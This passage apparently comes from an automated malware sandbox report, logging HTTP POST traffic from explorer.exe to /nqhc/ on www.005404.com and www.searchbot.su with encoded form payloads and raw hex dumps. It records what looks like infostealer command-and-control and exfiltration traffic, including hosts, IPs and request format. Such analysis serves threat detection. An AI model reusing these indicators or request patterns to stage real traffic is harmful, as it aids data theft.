67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66 40 24 ac af dd 88 15 0e a6 c2 ee 19 fb 1f 05 e9 27 15 cd 06 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 3adun6`Y`= JJt@rbBc?'@CI=y0J,^5"]1KQQSm^^pZn[L)UUkYaOLMyc|KJau%VW2~[8\e}SrP_|4\H3a^(mXif60H<Lg=/?8jnjdL% ^fj[%v:W8~J>"9->W]esfeJp$Y(x|*Y+22>,.TP+]29d%tBp"g?4g`$?;4:-vN22"`1x{+P#w>lw0j;yY29XxP{s-vNZr-WL?;ji`o^"%7m%>a:gQs.R\I"?mSPy[B__&ggI`gs%}8\@0h@/4Lza]+`4-,'%+iZp{s/}rsx>osOXVBB:_q6kS;%&{}vegS~27>S]4-mo!n`uSn2$gW1FyP^umJlx@f@$'0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    29192.168.11.2049854103.63.2.17580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:21:44.255990028 CET899OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.005404.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.005404.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.005404.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 44 77 6a 55 50 33 65 31 78 6c 31 59 56 6c 59 31 32 56 59 6a 79 50 57 48 36 71 69 64 6d 53 30 4e 77 59 57 71 57 4e 39 38 73 73 67 6e 55 48 43 4b 71 72 75 6e 57 62 4d 51 76 52 4d 4b 53 7a 7a 35 73 71 64 31 55 63 31 64 4d 6c 32 44 57 70 31 79 7a 57 57 51 37 51 57 6d 51 4c 63 4a 6e 7a 54 65 36 79 70 30 69 50 74 50 36 59 68 4f 7e 30 43 4d 45 31 34 5a 63 77 46 66 47 65 6b 79 4e 33 37 73 41 49 32 50 51 57 76 7a 70 4c 71 71 31 57 71 4b 79 4f 38 38 52 65 6c 36 47 42 70 41 65 6c 56 66 4b 42 7a 34 5a 6c 36 4b 6b 5f 7e 65 77 64 45 4e 70 42 37 74 50 5f 37 6c 77 64 4c 2d 33 50 64 77 4b 51 6a 79 62 46 47 6a 50 74 4c 76 5a 59 6d 42 66 47 49 63 73 4b 38 74 4c 68 59 57 7a 52 56 35 54 6d 61 79 30 30 42 43 4f 70 45 56 4b 72 57 79 36 57 4a 71 6d 79 45 32 4e 58 35 65 58 2d 51 4b 61 68 41 65 56 4b 48 5f 32 34 61 6e 59 6d 62 35 4f 30 73 53 6b 35 66 41 54 51 4d 52 57 45 4c 52 35 72 48 57 67 70 71 2d 55 61 48 45 66 4b 55 5a 67 6f 6d 63 48 62 73 78 4b 52 59 39 64 43 61 43 51 58 78 30 36 38 6a 57 79 59 4e 43 72 44 72 56 6e 74 69 54 54 4c 33 30 5a 5a 52 78 69 76 38 72 4b 30 62 31 50 33 58 71 79 4c 33 6f 42 69 48 72 72 63 4f 6b 61 68 73 52 4c 32 6a 45 6a 63 6e 61 31 72 49 64 79 45 54 43 73 33 75 47 73 52 52 36 36 46 30 56 79 63 4e 48 66 30 4b 31 50 52 66 6b 38 58 77 39 51 45 54 42 56 45 6e 55 35 76 72 39 6f 71 4a 4a 58 39 74 7a 61 74 6f 31 50 46 45 5f 32 53 70 77 66 42 6d 43 4f 49 4c 4b 46 32 51 73 7e 5f 67 55 39 58 70 42 4f 58 49 71 70 48 6c 4a 50 37 34 48 46 68 36 79 59 4b 45 76 6e 78 36 36 44 6d 51 5f 65 50 64 6c 7e 67 51 6e 44 57 70 62 48 52 52 33 6c 4f 4e 6f 54 45 48 31 30 56 49 53 48 63 79 73 51 62 52 4b 66 30 62 44 78 71 69 49 6d 6c 42 6f 4f 76 36 65 72 58 47 33 50 4a 59 39 6f 54 33 45 62 79 6d 39 70 78 6f 5a 73 65 63 63 6b 75 59 34 68 78 47 53 44 65 74 5f 51 30 4e 6a 6a 62 6c 42 51 67 66 61 4b 33 55 6a 35 59 4f 47 65 50 62 48 4e 31 54 74 59 41 4f 38 6d 79 47 61 31 4d 58 4c 47 76 77 6a 68 55 33 42 36 59 7a 32 7e 47 71 4c 76 56 63 53 72 6c 78 6f 64 4a 6a 78 67 79 6e 43 6f 41 61 4a 68 71 43 55 64 62 30 6b 4b 66 7a 50 44 41 37 71 63 76 6d 31 52 65 6b 4e 75 64 50 77 30 52 74 61 44 33 4f 4a 66 53 31 54 46 48 79 53 67 52 52 56 32 77 6b 41 68 31 35 5f 74 36 55 46 68 31 41 6b 70 73 6a 50 66 33 44 77 7e 62 37 55 79 75 62 75 62 46 4e 39 77 4a 39 67 5a 6b 28 52 4a 4c 4c 65 6d 57 75 4a 31 64 30 4d 59 69 73 4e 44 31 6f 30 4d 68 64 45 41 71 5a 4f 6b 65 73 6b 30 4a 6d 79 58 71 79 50 75 51 37 37 50 46 78 6c 59 5a 72 7a 37 4d 67 4e 75 63 71 78 57 72 61 38 4a 51 52 73 45 4d 36 31 34 73 7e 4f 7a 52 79 5a 77 4e 4c 34 6d 72 58 4a 4b 39 66 79 73 43 49 33 77 52 7a 32 52 7a 7e 38 4d 36 45 45 7e 63 41 55 28 72 7e 51 57 62 53 69 4c 76 77 69 6a 4c 74 45 35 4a 37 50 4e 5f 4e 35 77 69 56 34 50 41 34 59 41 39 79 58 35 73 56 36 46 36 65 62 69 55 53 66 6e 31 6a 41 54 6d 6e 46 50 58 66 78 4e 4e 64 64 78 78 69 32 63 6f 65 47 73 65 64 49 4d 48 64 59 76 4a 4c 70 53 49 35 39 49 6a 69 38 68 38 56 75 54 64 35 36 42 58 34 44 35 48 4a 68 78 46 75 6e 79 54 31 6a 57 76 78 79 42 6c 63 4f 49 52 34 45 69 54 56 5f 6e 49 28 31 30 5a 6e 48 75 2d 49 50 72 36 5a 31 6d 59 44 71 4a 56 50 2d 71 6b 49 44 72 52 59 4f 31 49 57 53 34 50 61 64 65 7a 4b 50 5a 45 67 58 52 50 57 33 69 77 4f 5a 33 52 37 55 7e 77 35 5f 72 5a 78 71 63 74 4a 67 41 6a 41 79 79 54 78 6a 75 58 43 6e 50 67 47 75 6c 7a 4f 65 76 5a 70 49 74 67 72 39 30 42 70 2d 47 6e 72 6d 63 30 58 77 4d 67 50 69 28 77 43 31 6c 78 67 32 6b 6c 61 78 71 77 76 4a 38 2d 72 41 6d 4d 53 41 4d 30 6d 71 44 62 4e 6b 53 37 55 4d 32 6b 75 78 6e 44 50 32 78 58 69 4c 38 4d 7e 7a 50 41 7e 56 54 70 53 72 67 54 49 66 58 65 39 47 71 57 6b 39 4a 6e 77 42 56 6d 4e 5a 7e 38 38 4a 6c 67 7e 52 47 7a 6f 69 6e 74 5a 32 7e 4c 45 4d 42 63 7a 4f 68 75 77 7a 68 34 7a 67 4a 78 55 36 38 42 33 51 4b 4a 48 35 65 72 48 56 59 2d 48 4e 35 75 4b 4f 28 57 75 43 4b 70 70 45 41 32 48 5a 7e 47 59 55 38 36 6a 72 73 4d 68 42 59 5a 78 78 6c 68 53 4e 71 63 49 6d 53 30 34 7a 46 6d 35 48 7e 53 31 50 76 41 69 70 62 44 4f 69 52 65 59 71 46 32 41 76 74 30 76 31 61 31 4c 79 33 69 58 55 50 54 63 45 34 67 28 72 6f 56 44 6d 54 4c 76 38 4f 6f 65 47 38 7a 30 38 61 68 44 2d 75
                                                                                                                                                                                    Data Ascii: r4txB=DwjUP3e1xl1YVlY12VYjyPWH6qidmS0NwYWqWN98ssgnUHCKqrunWbMQvRMKSzz5sqd1Uc1dMl2DWp1yzWWQ7QWmQLcJnzTe6yp0iPtP6YhO~0CME14ZcwFfGekyN37sAI2PQWvzpLqq1WqKyO88Rel6GBpAelVfKBz4Zl6Kk_~ewdENpB7tP_7lwdL-3PdwKQjybFGjPtLvZYmBfGIcsK8tLhYWzRV5Tmay00BCOpEVKrWy6WJqmyE2NX5eX-QKahAeVKH_24anYmb5O0sSk5fATQMRWELR5rHWgpq-UaHEfKUZgomcHbsxKRY9dCaCQXx068jWyYNCrDrVntiTTL30ZZRxiv8rK0b1P3XqyL3oBiHrrcOkahsRL2jEjcna1rIdyETCs3uGsRR66F0VycNHf0K1PRfk8Xw9QETBVEnU5vr9oqJJX9tzato1PFE_2SpwfBmCOILKF2Qs~_gU9XpBOXIqpHlJP74HFh6yYKEvnx66DmQ_ePdl~gQnDWpbHRR3lONoTEH10VISHcysQbRKf0bDxqiImlBoOv6erXG3PJY9oT3Ebym9pxoZsecckuY4hxGSDet_Q0NjjblBQgfaK3Uj5YOGePbHN1TtYAO8myGa1MXLGvwjhU3B6Yz2~GqLvVcSrlxodJjxgynCoAaJhqCUdb0kKfzPDA7qcvm1RekNudPw0RtaD3OJfS1TFHySgRRV2wkAh15_t6UFh1AkpsjPf3Dw~b7UyububFN9wJ9gZk(RJLLemWuJ1d0MYisND1o0MhdEAqZOkesk0JmyXqyPuQ77PFxlYZrz7MgNucqxWra8JQRsEM614s~OzRyZwNL4mrXJK9fysCI3wRz2Rz~8M6EE~cAU(r~QWbSiLvwijLtE5J7PN_N5wiV4PA4YA9yX5sV6F6ebiUSfn1jATmnFPXfxNNddxxi2coeGsedIMHdYvJLpSI59Iji8h8VuTd56BX4D5HJhxFunyT1jWvxyBlcOIR4EiTV_nI(10ZnHu-IPr6Z1mYDqJVP-qkIDrRYO1IWS4PadezKPZEgXRPW3iwOZ3R7U~w5_rZxqctJgAjAyyTxjuXCnPgGulzOevZpItgr90Bp-Gnrmc0XwMgPi(wC1lxg2klaxqwvJ8-rAmMSAM0mqDbNkS7UM2kuxnDP2xXiL8M~zPA~VTpSrgTIfXe9GqWk9JnwBVmNZ~88Jlg~RGzointZ2~LEMBczOhuwzh4zgJxU68B3QKJH5erHVY-HN5uKO(WuCKppEA2HZ~GYU86jrsMhBYZxxlhSNqcImS04zFm5H~S1PvAipbDOiReYqF2Avt0v1a1Ly3iXUPTcE4g(roVDmTLv8OoeG8z08ahD-ulBYkXPH8HOJ84rBA6Nb9ppVQKrRev4_TJUrASCXzQrjW4wNg0auhj~sB837rFg2pyO5CNF4orTm1o78lmmmuyCgKQHkPUznU_CtbXXFnbf9C3UUkqOZhXDqh9gknZIsYIGBfRvUdUMQaXp7JW2J5McANgXd7Dqxjjf3UCsALnW0jFRjC3BOEhfzrT~_hfRvTmEqdtYvW6MzJ6LVoG(0lK5IHlBNeUKpTOFZPFfNIgZypEY7plKXW_cxJReXPOxdJz~Arcxs5VJ6vX6f5b3CcAW3lpEBw2D5NxyBnI(RmgwJiSwtCKPVj3RqrwrErN0oCwCDEPly4Iv_rm9ZL1C85Zh0XECC6GkUFVshHhirjdHtGxtIbW3d1kIAvch24rEPKfkEEObevsKQfPh3nOvM(lJwqgm1ERGqVyQEB1iPEDTGups9shhYCJOaZwAJf9DO9FEXKdycl6ZeI0uggq13tDARHeUf6_itO1J2AWOPzFLutN3ODtbE~K4kmmZdVmI_ybyXjSmOXLzbsBLTo59RvmsvCqG-p0n_81MbLjPBCgE7~Ta3wVSov-fmeu(T~vcUed~ZCqDwA4Emdgg6R-i1OoMqnLJIFIAgjaqgylUKWBLT4FgLgiHqCZlQCuNjmHAGdeQj9Tz8EzCfOhT8LjStT_ZiwKQRN0bpwJezmWz3xrVNxshjHucJ(BngPIezn_5apL2l1h5Sujbq0OI5nbxzgF18J-hjPscKhE7_xZhc0wapnl4SLvBT2ewMZ3sCyZ0eMSDkiZsxGckjVc2OME40bjcmJdzAJCYLT_5RfJRnLbqmLOBY0KAAup
                                                                                                                                                                                    Nov 21, 2022 19:21:44.256022930 CET904OUTData Raw: 59 43 59 6a 68 4d 4e 4b 53 68 35 4d 32 2d 78 52 4f 33 6f 68 53 37 65 62 73 44 72 78 35 7a 66 30 6e 6f 6a 44 53 43 28 68 53 63 4f 4a 52 6e 47 52 75 2d 5a 48 72 31 42 56 4a 32 6b 66 73 6d 58 5a 43 74 36 76 49 78 4b 70 68 55 34 73 59 66 44 52 43 67
                                                                                                                                                                                    Data Ascii: YCYjhMNKSh5M2-xRO3ohS7ebsDrx5zf0nojDSC(hScOJRnGRu-ZHr1BVJ2kfsmXZCt6vIxKphU4sYfDRCgwWQSroL4(W48nz37HYiODXYmjKp1VFOGgkLSZ_rqOM(iN1XQNpImRLSfeEiD(CHCtqAK~w(3U_lyYjgAi3r0KOrzhTBg4fuP78VN40eTi6gXV3KLPBZDlf6EGHt6p6CkwbFmf1T7k58sJ6SUa15JsoBKlXtzi1I1j
                                                                                                                                                                                    Nov 21, 2022 19:21:44.256071091 CET909OUTData Raw: 4e 36 57 31 37 74 62 72 63 6c 43 37 5a 30 6d 74 50 45 76 4e 54 51 33 49 48 37 4f 47 4b 4b 4b 36 52 68 4d 4e 62 64 46 45 66 64 41 78 76 2d 73 6a 43 42 68 74 4a 39 4b 61 57 2d 63 7a 30 76 75 43 52 6e 34 45 66 41 4e 57 55 55 4a 41 51 52 4e 56 61 76
                                                                                                                                                                                    Data Ascii: N6W17tbrclC7Z0mtPEvNTQ3IH7OGKKK6RhMNbdFEfdAxv-sjCBhtJ9KaW-cz0vuCRn4EfANWUUJAQRNVavcjMBF5uLZmT2ZNJYc3xhUvcxhZZ8tprDWlC9GYRRbPdkwF1kPo~eNUSocNV55cofN1lG7R9ZVpm5p8T5qi7MTnw6Z_GqqFDxCAXP8W84pqd7kSCzVP39kN2SVb7bUvcVNTcuRfiHqPwC8-QeAYBE0Ps-ftb2L73XT
                                                                                                                                                                                    Nov 21, 2022 19:21:44.431605101 CET912OUTData Raw: 4a 66 52 6d 7a 39 71 4f 76 75 35 61 37 30 73 54 73 6d 7a 72 65 77 41 70 4e 45 39 77 30 4c 5a 56 43 78 32 47 66 39 28 38 54 70 54 4d 54 70 36 38 64 48 47 41 69 2d 32 39 51 67 33 4e 7a 4a 6e 4e 32 50 6b 52 43 4a 47 44 38 70 28 47 61 4a 37 74 55 57
                                                                                                                                                                                    Data Ascii: JfRmz9qOvu5a70sTsmzrewApNE9w0LZVCx2Gf9(8TpTMTp68dHGAi-29Qg3NzJnN2PkRCJGD8p(GaJ7tUWgEvEJZ91I0EOhDxL7l(9RuEsq-2djGg0U2kFeOzxjMIQrQRV5B9fFbSdho1fJNbmbln0er48IqaW4UKb3z4PrbjOqFp9h33l3QQse84uEZO1dm0xJ4tJHjeWVdsxzlxJEg5LRCM2I2CIIdPEBThNkHIwp0nj1sh51
                                                                                                                                                                                    Nov 21, 2022 19:21:44.431735992 CET914INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:21:44 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    ETag: W/"634bbb43-6cd"
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Data Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66 40 24 ac af dd 88 15 0e a6 c2 ee 19 fb 1f 05 e9 27 15 cd 06 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 3adun6`Y`= JJt@rbBc?'@CI=y0J,^5"]1KQQSm^^pZn[L)UUkYaOLMyc|KJau%VW2~[8\e}SrP_|4\H3a^(mXif60H<Lg=/?8jnjdL% ^fj[%v:W8~J>"9->W]esfeJp$Y(x|*Y+22>,.TP+]29d%tBp"g?4g`$?;4:-vN22"`1x{+P#w>lw0j;yY29XxP{s-vNZr-WL?;ji`o^"%7m%>a:gQs.R\I"?mSPy[B__&ggI`gs%}8\@0h@/4Lza]+`4-,'%+iZp{s/}rsx>osOXVBB:_q6kS;%&{}vegS~27>S]4-mo!n`uSn2$gW1FyP^umJlx@f@$'0
                                                                                                                                                                                    Nov 21, 2022 19:21:44.431806087 CET919OUTData Raw: 66 4b 5a 70 66 41 4e 72 76 68 31 51 73 70 70 39 6d 79 79 43 4a 68 56 75 36 41 54 4d 31 55 62 43 52 75 6f 6e 57 7a 56 74 76 58 52 59 44 57 37 45 61 41 61 59 51 38 6b 31 4e 4f 47 54 73 45 76 74 6e 57 4f 4a 79 54 62 57 6e 50 57 49 59 66 31 6e 6d 74
                                                                                                                                                                                    Data Ascii: fKZpfANrvh1Qspp9myyCJhVu6ATM1UbCRuonWzVtvXRYDW7EaAaYQ8k1NOGTsEvtnWOJyTbWnPWIYf1nmtOxMhdGX_ljBaAphYWozMsmuFxACLA7RICJdbWV(X(RFis7RFiS~Znct11idUPfKqbGYn86K2H_Pfk9zTnF5p8lm2MZ4DEQAqLgRS(Q~vlssMRwUxeMLyrtrRTTr8hklN0DUmBlVOVXH98nvjtCEhGIzaHsPR7-kKI
                                                                                                                                                                                    Nov 21, 2022 19:21:44.431952000 CET935OUTData Raw: 65 58 66 37 4c 2d 68 30 51 4e 69 38 65 39 64 31 37 69 4f 44 59 75 62 43 45 47 6f 48 57 4d 68 39 79 57 72 50 43 64 36 67 77 70 4c 71 62 48 38 30 7e 47 6b 33 65 6c 30 31 34 55 59 67 57 38 37 6a 38 43 54 76 56 4a 56 59 54 62 71 72 79 4a 47 6e 32 5f
                                                                                                                                                                                    Data Ascii: eXf7L-h0QNi8e9d17iODYubCEGoHWMh9yWrPCd6gwpLqbH80~Gk3el014UYgW87j8CTvVJVYTbqryJGn2_Y25GQLaSNQ~KqCNIekoafHBvprq5Cdcj7ut1soVAChyM2NmWwIxjypToOpziTOwWfRpDiTKZlbu6vEbc2sO_vb6ncM5wweyB5TaWd7m7UWUEIujMdf7nrDty8B8vd6tilMVIyI2OdN4osWK-avzs3fagqYCpeLAzK
                                                                                                                                                                                    Nov 21, 2022 19:21:44.432089090 CET936OUTData Raw: 5a 46 73 67 39 6a 35 55 6f 6b 39 7a 73 39 45 72 49 74 61 70 65 44 7a 4d 4c 46 65 71 39 48 6d 73 7e 56 31 45 56 77 38 63 58 68 66 39 54 33 30 53 30 6f 39 39 4e 67 31 42 72 33 37 54 48 30 36 79 73 61 62 4b 55 32 6c 69 4d 63 6e 61 68 49 75 6b 53 64
                                                                                                                                                                                    Data Ascii: ZFsg9j5Uok9zs9ErItapeDzMLFeq9Hms~V1EVw8cXhf9T30S0o99Ng1Br37TH06ysabKU2liMcnahIukSdoaiPmiMU2m18jgta3LxcPiurtfQ2c47RJVNgaTlUrykgJBNhUELU9hO-dpWbJpaCrepDoOE4mzkdjW1dnSxKiaj1ViAypuwtqmncEr4YAGm5qTvh5TriTcHM6WdLxhqLv1GsCsImKVAuG5OzchJhSGNDwJ~ykfHYk
                                                                                                                                                                                    Nov 21, 2022 19:21:44.607988119 CET939OUTData Raw: 65 69 49 30 57 47 75 77 54 65 6e 6b 72 2d 66 52 6a 70 4b 46 41 56 6e 42 4e 36 37 77 6f 71 62 35 61 67 37 75 53 30 7a 69 6c 52 4e 50 5a 58 65 59 4b 63 6d 38 57 30 6b 50 34 74 4c 72 48 65 6e 64 72 44 47 73 39 69 6d 35 30 54 4b 69 33 4c 54 6d 63 63
                                                                                                                                                                                    Data Ascii: eiI0WGuwTenkr-fRjpKFAVnBN67woqb5ag7uS0zilRNPZXeYKcm8W0kP4tLrHendrDGs9im50TKi3LTmcc1GEdzjKytr(tl2RAUPkgo1BVuFi1pdz1dRC2xEpd6vK5V_uzXIhOz2RpK10-ilv3UyMcmGomrfVR6dlG4GjnnMXrgY(OOSMJvk(Gbq2GD711g4LDRjygYtOVbd8tUYvAxUQG3XEaqIadyXq6Hu7etN(qAzetF_VnD
                                                                                                                                                                                    Nov 21, 2022 19:21:44.608093977 CET946OUTData Raw: 32 69 52 49 52 34 48 48 44 5a 7e 4d 50 75 4c 47 74 47 6e 53 57 36 4c 75 4d 47 72 67 57 5a 46 36 7e 52 46 69 78 71 39 71 4b 44 44 46 63 64 6b 32 6b 6e 7a 53 44 6a 79 71 4d 79 41 5f 4b 5f 48 5f 30 4f 61 6f 53 4a 79 51 61 34 48 70 4c 66 71 66 67 4f
                                                                                                                                                                                    Data Ascii: 2iRIR4HHDZ~MPuLGtGnSW6LuMGrgWZF6~RFixq9qKDDFcdk2knzSDjyqMyA_K_H_0OaoSJyQa4HpLfqfgOo2csKqLGa9ivihOFSIamp_maT1Pg87K6b6k32_mCr4Ss(A6Xh2mZ~nt4S5rGsHOHTZBiBJMNRE7TafWy9ULsrEuUh65EEXkVKlKFIaTBKyry5UArSf3DKv1bwWgVcpbWA8gM7oVJ3zOJZfWCLPxkOUrUA-RmMy51I
                                                                                                                                                                                    Nov 21, 2022 19:21:44.608160019 CET950OUTData Raw: 51 37 7e 46 64 43 31 72 75 4a 46 38 42 67 39 42 62 61 69 66 7e 64 69 4e 4f 64 6d 59 50 57 7a 49 44 4b 37 49 41 35 4f 70 4a 61 76 44 42 42 37 33 56 59 62 70 7e 35 6a 33 55 4f 71 2d 42 71 46 75 43 55 37 66 30 53 49 64 66 61 59 2d 55 33 74 4d 66 69
                                                                                                                                                                                    Data Ascii: Q7~FdC1ruJF8Bg9Bbaif~diNOdmYPWzIDK7IA5OpJavDBB73VYbp~5j3UOq-BqFuCU7f0SIdfaY-U3tMfi6A(6QpPLww0DXOBZQPOpUAEocp0d3wCtZEtenZpn7-8grhsKORgfwghUKj8qF4bDOAVCo_OQ7LJIITgvt8srxJI_RXpGn5H-7Dwou_neSIU1hs0r0kfYAXOvRCs8CEw-YOZBpKceQQAE~GXhDinI71BLxTzCSSs2Y


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    3192.168.11.204982645.130.41.2480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:20:17.297430992 CET494OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.searchbot.su
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.searchbot.su
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.searchbot.su/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 39 6a 5a 50 44 69 71 45 4a 47 6e 31 68 71 50 63 4a 53 4c 33 50 73 74 6f 61 70 61 52 76 30 4b 52 30 70 68 4f 30 4e 45 51 34 4a 4f 38 66 61 6b 44 33 38 6c 38 43 57 66 6c 75 35 6a 6c 28 76 75 52 30 4d 55 62 33 43 72 61 63 63 35 58 47 68 44 33 65 68 6c 39 56 44 66 49 4e 55 43 4b 72 47 31 57 32 69 75 4f 35 5a 45 50 73 61 36 4f 57 50 78 66 77 41 47 37 59 43 48 6a 55 6a 61 31 6d 53 66 35 6c 49 43 67 4f 61 77 36 78 46 32 51 34 7a 38 59 52 69 6d 61 73 4b 31 65 35 63 7a 55 61 56 4d 43 64 6e 5a 52 43 69 30 62 6d 38 39 56 54 50 64 57 56 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=9jZPDiqEJGn1hqPcJSL3PstoapaRv0KR0phO0NEQ4JO8fakD38l8CWflu5jl(vuR0MUb3Cracc5XGhD3ehl9VDfINUCKrG1W2iuO5ZEPsa6OWPxfwAG7YCHjUja1mSf5lICgOaw6xF2Q4z8YRimasK1e5czUaVMCdnZRCi0bm89VTPdWVg).
                                                                                                                                                                                    Nov 21, 2022 19:20:17.391448021 CET494INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx-reuseport/1.21.1
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:20:17 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
